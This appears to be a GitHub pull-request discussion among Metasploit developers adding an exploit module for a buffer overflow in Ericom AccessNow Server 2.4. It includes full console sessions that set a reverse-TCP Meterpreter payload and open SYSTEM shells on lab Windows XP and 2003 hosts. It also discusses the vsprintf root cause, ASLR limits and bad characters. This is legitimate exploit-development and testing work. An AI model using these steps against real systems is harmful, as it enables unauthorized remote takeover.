Add module for ZDI-14-160 Ericom AccessNow Server Buffer Overflow

[jvazquez-r7]

Tested successfully on Win2003 SP2 and Ericom AccessNow Server 2.4.0.2.

Verification

• Install Windows 2003 SP2
• Install Ericom AccessNow Server 2.4.0.2 which can be downloaded from http://www.ericom.com/accessnow_older_version.asp (at least at the time of writing). I couldn't find unpatched 3 version installer :.
• Use the module like in the demo, hopefully enjoy sessions!

msf > use exploit/windows/http/ericom_access_now_bof
msf exploit(ericom_access_now_bof) > set rhost 172.16.158.182
rhost => 172.16.158.182
msf exploit(ericom_access_now_bof) > check
[*] 172.16.158.182:8080 - The target appears to be vulnerable.
msf exploit(ericom_access_now_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ericom_access_now_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.182:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 172.16.158.182
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.182:1054) at 2014-06-17 15:06:41 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.182 - Meterpreter session 1 closed.  Reason: User exit

[kernelsmith]

I got this

[OJ]

J'ai eu ce bébé couvert!

[kernelsmith]

@jvazquez-r7 Win2k3 to avoid ASLR issues?
@OJ I'm a dumb American, no speaky your frufru language. You're lucky Google isn't as narrow-minded as I am. I can do 'Merican, Spanish, a sprinkle of German, and a touch of Albanian only

[kernelsmith]

"user controlled data", not "used controlled data" -- I can cleanup on landing

[jvazquez-r7]

thanks!

[jvazquez-r7]

@kernelsmith yup :( hard to make it happen with aslr enabled with just this vuln I think, since data is appended after the controlled data, looks hard to work with least significant bytes overwrite to bypass ASLR here. Any ideas to bypass ASLR here with this vuln? I'm happy of investing more time if there are proposals! thanks for reviewing!

[OJ]

I shall leave this baby to @kernelsmith :)

[kernelsmith]

@jvazquez-r7 I have the pre-patch ver 3.x installer if you want it. I'll take a look into the ASLR issue, but not before I land this. Also, the vuln in 2.4 looks different from the one in 3.x, so I think technically this isn't the same as the one listed by ZDI, but whatever. I'll also look at porting it to 3.x and maybe we can keep it all in one module.

BTW, working on XP:

msf exploit(ericom_access_now_bof) > so

Module options (exploit/windows/http/ericom_access_now_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.66.128   yes       The target address
   RPORT    8080             yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.66.1     yes       The listen address
   LPORT     8989             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]

msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 192.168.66.1:8989
[*] 192.168.66.128:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 192.168.66.128
[*] Meterpreter session 1 opened (192.168.66.1:8989 -> 192.168.66.128:1207) at 2014-06-17

[kernelsmith]

working on 2k3 as well, landing

msf exploit(ericom_access_now_bof) > so

Module options (exploit/windows/http/ericom_access_now_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.66.216   yes       The target address
   RPORT    8080             yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.66.1     yes       The listen address
   LPORT     8989             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]

msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 192.168.66.1:8989
[*] 192.168.66.216:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 192.168.66.216
[*] Meterpreter session 2 opened (192.168.66.1:8989 -> 192.168.66.216:1028) at 2014-06-17 

meterpreter > sysinfo
Computer        : WIN2K3
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

[kernelsmith]

y u no close as merged PR?

[OJ]

Troll gods.

[jvazquez-r7]

@kernelsmith, I fixed the typo by myself on this commit: jvazquez-r7@f622a3a but you didn't land this last commit, and fixed the typo by yourself. Because of that this pull request has not been closed. You can make github close it by landing the forgiven commit :)

[jvazquez-r7]

@kernelsmith indeed the ZDI advisory is a little bit confusing in my opinion: The specific flaw exists in the way AccessServer32.exe handles requests for non-existent files <-- Indeed it's not while handling request for non-existent files. At least in 2.4 version, its while building error messages in an insecure way with vsprintf. If you send a long uri (for a non existing resource), the vsprintf will overflow when building a "File not found" message. But if you overflow with a bad HTTP query the error string will be an "Incorrect request" one. I've preferred the "Incorrect request" case because there are not so many badchars restrictions when exploiting =) (I'm lazy) But my guess is which the vulnerability is the same one the ZDI is reporting. (Indeed the patch is a switch to vsnprintf If I am remembering correctly (sorry for writing without double checking... shame))

[jvazquez-r7]

@kernelsmith if you could share the pre-patched binary for version 3 it would be cool =) I couldn't find it on the vendor homepage :( Looks like there aren't vulnerable 3 installers anymove in the vendor page.

I'd be happy of confirm my feelings about the vulnerability root cause on version 3 and sharing my opinion :)

[kernelsmith]

This advisory does not apply to 2.4, only 3.1. The vuln in 2.4 is a separate vuln. The vuln in 3.1 may be a failed patch for the vuln in 2.4, I haven’t looked at 2.4 yet.

On Jun 17, 2014, at 11:20 PM, Juan Vazquez notifications@github.com wrote:

@kernelsmith indeed the ZDI advisory is a little bit confusing in my opinion: The specific flaw exists in the way AccessServer32.exe handles requests for non-existent files <-- Indeed it's not while handling request for non-existent files. At least in 2.4 version, its while building error messages in an insecure way with vsprintf. If you send a long uri (for a non existing resource), the vsprintf will overflow when building a "File not found" message. But if you overflow with a bad HTTP query the error string will be an "Incorrect request" one. I've preferred the "Incorrect request" case because there are not so many badchars restrictions when exploiting =) (I'm lazy) But my guess is which the vulnerability is the same one the ZDI is reporting. (Indeed the patch is a switch to vsnprintf If I am remembering correctly (sorry for writing without double checking... shame))

—
Reply to this email directly or view it on GitHub.

[jvazquez-r7]

You did it! great work @kernelsmith ! :D